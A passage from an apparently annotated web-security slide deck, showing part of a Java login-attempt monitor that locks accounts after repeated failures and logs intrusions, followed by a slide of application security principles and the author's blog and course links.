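        while (!recent.isEmpty() && recent.peekFirst().isBefore(cutoff)) {
            recent.pollFirst();            // drop failures outside the window
        }
        if (recent.size() < threshold) {
            return false;
        }
        Instant until = now.plus(lockout);
        lockedUntil.put(account, until);
        recent.clear();
        securityLog.add("INTRUSION account=" + account + " ip=" + clientIp
                + " failures=" + threshold + " within=" + window + " locked_until=" + until);
        return true;
    }

    public synchronized void recordSuccess(String account) {
        failures.remove(account);
    }

    public synchronized List<String> securityLog() {
        return new ArrayList<>(securityLog);
    }

    public static void main(String[] args) {
        LoginAttemptMonitor monitor =
                new LoginAttemptMonitor(5, Duration.ofMinutes(10), Duration.ofMinutes(30));
        Instant t0 = Instant.parse("2010-11-12T10:00:00Z");   // constructed timestamps
        for (int i = 0; i < 5; i++) {
            boolean locked = monitor.recordFailure("admin", "203.0.113.7", t0.plusSeconds(i * 2L));
            System.out.println("failure " + (i + 1) + " -> lock triggered: " + locked);
        }
        System.out.println("admin locked at t0+10s: " + monitor.isLocked("admin", t0.plusSeconds(10)));
        System.out.println("admin locked at t0+31m: "
                + monitor.isLocked("admin", t0.plus(Duration.ofMinutes(31))));
        monitor.securityLog().forEach(System.out::println);
    }
}
```

Keying the counter on the account (not only on the client IP) is what makes the lock land on the admin accounts the slides describe as the usual target; the log line is the part that is "normally not done" and is what a console like AppSensor's would consume.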
76. Proven application security principles
Apply defense in depth
Use a positive security model
fail-safe defaults, minimize attack surface
Fail securely
Run with least privilege
Avoid security by obscurity
Keep security simple
Detect intrusions
Don’t trust infrastructure
Don’t trust services
77. Want to know more?
My blog
http://www.carlobonamico.com
My Company
http://www.nispro.it
JUG Genova
http://juggenova.net
Attend a course
Web Application Security (3 days)
http://www.nispro.it/education/education_focus_sec.html
Thank you for your attention!